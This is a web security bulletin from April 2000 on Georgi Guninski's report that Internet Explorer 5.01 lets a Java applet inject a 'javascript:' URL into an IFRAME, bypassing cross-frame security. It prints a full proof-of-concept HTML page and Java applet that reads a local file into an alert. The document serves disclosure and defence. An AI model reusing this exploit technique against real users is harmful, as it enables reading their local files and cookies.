Skip navigation
Menu
Security

IE 5 Allows Cross-frame Navigation

 
IE 5 Allows Cross-frame Navigation
Reported April 18, 2000 by Georgi Guninski
VERSIONS EFFECTED
  • Internet Explorer 5.01 (only tested on Win98, however other platforms may be affected)

DESCRIPTION

Internet Explorer 5.01 (IE5) allows the circumvention of its cross-frame security policy by accessing the DOM of documents using Java or JavaScript.

The problem exposes the whole DOM of the target document and according to Georgi, opens lots of additional security risks. The problem allows reading local files, reading files from any host, window spoofing, retrieving cookies, and more.

According to Georgi"s report, "this is not a bug in the Java language but a bug in Microsoft"s implementation of Java witin IE. Normally, IE 5.x does not allow assigning "javascript:" urls to the location object because this is dangerous. But this may be circumvented with the help of the interaction between Java and the DOM/JavaScript. The Java JSObject allows setting DOM properties from Java and allows setting a hostile javascript url to the IFRAME"s location. This leads to circumventing cross-frame security policy."

Georgi adds that if you disable Active Scripting but have Java and Scripting of Java applets both enabled, then Active Scripting may still execute in the browser. The problem seems to be the fact that IE always executes Active Scripting in "My Computer" zone and with Java one may inject javascript:URLs into IFRAMEs within "My Computer" zone. So to really disable Active Scripting you must not only disable Active Scripting but also disable Java and/or Scripting of Java applets.

DEMONSTRATION

Georgi"s code is as follows:

------jsinject.html--------------------------------
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
<A HREF="javascript:document.applets\[0\].doit()">Read the file</A>
---------------------------------------------------

------jsinject.java--------------------------------
import java.applet.Applet;
import netscape.javascript.*;

public class jsinject extends Applet \{

public void doit()
\{
try
\{
JSObject win = (JSObject) JSObject.getWindow(this);
JSObject doc = (JSObject) win.getMember("document");
JSObject I1 = (JSObject) doc.getMember("I1");
JSObject loc = (JSObject) I1.getMember("location");
loc.setMember("href",getParameter("jscode"));
\}
catch(Exception x)\{System.out.println(x.toString());\}
\}
\}
---------------------------------------------------

VENDOR RESPONSE

No response was known from Microsoft at the time of this writing. We will update this bulletin upon their response.

CREDITS
Discovered and reported by Geogi Guninski
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
Businesswoman challenges concept and gender obstacles
Women in Cybersecurity Face Barriers to Hiring, Advancement
Apr 15, 2024
person typing on keyboard with icons for certificates
Top IT Certifications for a Career in Finance
Apr 12, 2024
employee working on a laptop with AI
Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
Mar 26, 2024
cleaning products
6 Essential Steps for Spring Cleaning Your Website
Mar 21, 2024